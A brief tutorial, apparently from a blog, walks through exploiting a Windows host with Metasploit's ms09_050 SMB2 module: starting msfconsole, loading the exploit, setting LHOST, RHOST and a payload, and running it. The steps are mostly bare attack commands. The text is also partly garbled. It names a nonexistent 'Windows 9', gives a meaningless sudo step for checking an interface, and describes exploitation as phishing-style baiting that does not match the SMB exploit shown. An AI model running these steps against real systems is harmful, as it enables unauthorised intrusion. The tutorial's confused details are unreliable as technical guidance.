Target exploitation is one of the step in doing a penetration test. It focuses on establishing access to a system by bypassing the security restrictions. Although finding an exploit can be done in various ways, one of the most common methods for exploits is by baiting the target to enter their information into malicious websites, and the target information will be exploited by the hacker. Target exploitation could be done by using Metasploit.
1. Make new IP address interface
– ifconfig (interface) (IPAddress) (subnetMask)
– sudo (interface) (IPAddress) (subnetMask) | To check if the interface exist
2. Start the Metasploit
– msfconsole
3. In this case, we try using Windows 9
– use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
4. read the target list by show command
– show options
– show targets
5. set LHOST (our IPAddress)
6. set RHOST (target’s IPAddress)
7. set PAYLOAD
8. exploit
The goal is to read the target information to find vulnerabilities and as Proof of Concept(POC).